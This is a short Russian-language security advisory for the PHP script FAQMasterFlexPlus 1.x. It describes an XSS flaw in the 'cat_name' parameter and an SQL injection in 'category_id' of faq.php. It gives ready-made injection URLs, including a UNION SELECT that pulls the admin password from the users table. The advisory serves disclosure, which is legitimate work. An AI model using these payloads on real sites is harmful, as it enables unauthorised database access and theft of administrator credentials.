Программа: FAQMasterFlexPlus 1.x

Уязвимость позволяет удаленному пользователю осуществить XSS нападение на целевую систему и выполнить произвольные SQL команды в базе данных приложения.

1) Уязвимость существует из-за недостаточной обработки входных данных в параметре "cat_name" сценарием faq.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://www.example.com/[path/to/faq/]/faq.php? category_id=1&cat_name=[XSS]

2) Уязвимость существует из-за недостаточной обработки входных данных в параметре "category_id" сценарием faq.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://www.example.com/[path/to/faq]/faq.php?category_id= 1’%20union%20select%201,1,user(),1/*

Для получения пароля администратора:

http://www.example.com/[path/to/faq]/faq.php?category_id= 1’%20union%20select%201,1,passwrd,1%20from%20users%20 where%20userid=’admin



Оставить мнение